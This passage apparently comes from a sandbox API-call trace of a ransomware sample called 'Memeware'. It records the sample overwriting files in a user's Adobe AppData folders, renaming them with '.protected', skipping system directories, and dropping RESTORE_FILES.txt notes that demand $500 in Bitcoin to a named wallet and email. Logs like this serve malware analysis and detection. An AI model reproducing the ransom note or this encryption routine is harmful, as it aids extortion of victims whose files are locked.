pdwDataLen=0x295e2b4*=0x30) returned 1 [0089.557] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\a9b8213768adc68af64fcc6409e8be414726687f.crl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0089.558] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl") returned 131 [0089.558] StrStrW (lpFirst="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", lpSrch=".txt") returned 0x0 [0089.558] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl") returned 131 [0089.558] StrStrW (lpFirst="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", lpSrch=".rar") returned 0x0 [0089.558] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl") returned 131 [0089.558] StrStrW (lpFirst="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", lpSrch=".zip") returned 0x0 [0089.558] ReadFile (in: hFile=0x158, lpBuffer=0x513c88, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0089.587] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.587] WriteFile (in: hFile=0x158, lpBuffer=0x513c88*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0089.587] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.587] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0089.595] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0089.595] CloseHandle (hObject=0x158) returned 1 [0089.599] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.protected") returned 141 [0089.599] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\a9b8213768adc68af64fcc6409e8be414726687f.crl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\a9b8213768adc68af64fcc6409e8be414726687f.crl.protected")) returned 1 [0089.601] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0089.601] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0089.601] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\RESTORE_FILES.txt") returned 104 [0089.601] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0089.643] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.643] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0089.644] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.644] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0089.644] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.644] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0089.644] CloseHandle (hObject=0x154) returned 1 [0089.644] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0089.644] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0089.644] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\RESTORE_FILES.txt") returned 95 [0089.644] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.645] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.645] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0089.646] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.646] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0089.646] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.646] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0089.646] CloseHandle (hObject=0x150) returned 1 [0089.646] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0089.646] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0089.646] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\RESTORE_FILES.txt") returned 86 [0089.646] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0089.648] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.648] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0089.648] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.648] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0089.649] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.649] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0089.649] CloseHandle (hObject=0x14c) returned 1 [0089.650] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.650] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.650] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\RESTORE_FILES.txt") returned 81 [0089.650] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.651] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.651] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.652] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.652] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.652] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.652] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0089.652] CloseHandle (hObject=0xd8) returned 1 [0089.652] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.652] lstrcmpiW (lpString1="Flash Player", lpString2="Windows") returned -1 [0089.652] lstrcmpiW (lpString1="Flash Player", lpString2="Program Files") returned -1 [0089.652] lstrcmpiW (lpString1="Flash Player", lpString2="Program Files (x86)") returned -1 [0089.652] lstrcmpiW (lpString1="Flash Player", lpString2="$Recycle.bin") returned 1 [0089.652] lstrcmpiW (lpString1="Flash Player", lpString2="System Volume Information") returned -1 [0089.652] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player") returned 68 [0089.652] lstrcmpW (lpString1="Flash Player", lpString2=".") returned 1 [0089.652] lstrcmpW (lpString1="Flash Player", lpString2="..") returned 1 [0089.652] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\*") returned 70 [0089.652] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.653] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.653] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.653] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.653] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.653] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.653] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\.") returned 70 [0089.653] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.653] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.653] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.653] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.654] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.654] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.654] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.654] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\..") returned 71 [0089.654] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.654] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.654] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.654] lstrcmpiW (lpString1="AssetCache", lpString2="Windows") returned -1 [0089.654] lstrcmpiW (lpString1="AssetCache", lpString2="Program Files") returned -1 [0089.654] lstrcmpiW (lpString1="AssetCache", lpString2="Program Files (x86)") returned -1 [0089.654] lstrcmpiW (lpString1="AssetCache", lpString2="$Recycle.bin") returned 1 [0089.654] lstrcmpiW (lpString1="AssetCache", lpString2="System Volume Information") returned -1 [0089.654] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache") returned 79 [0089.654] lstrcmpW (lpString1="AssetCache", lpString2=".") returned 1 [0089.654] lstrcmpW (lpString1="AssetCache", lpString2="..") returned 1 [0089.654] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*") returned 81 [0089.654] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0089.654] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.654] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.654] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.654] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.654] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.654] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\.") returned 81 [0089.655] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.655] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.655] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.655] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.655] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.655] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.655] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.655] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\..") returned 82 [0089.655] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.655] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.655] 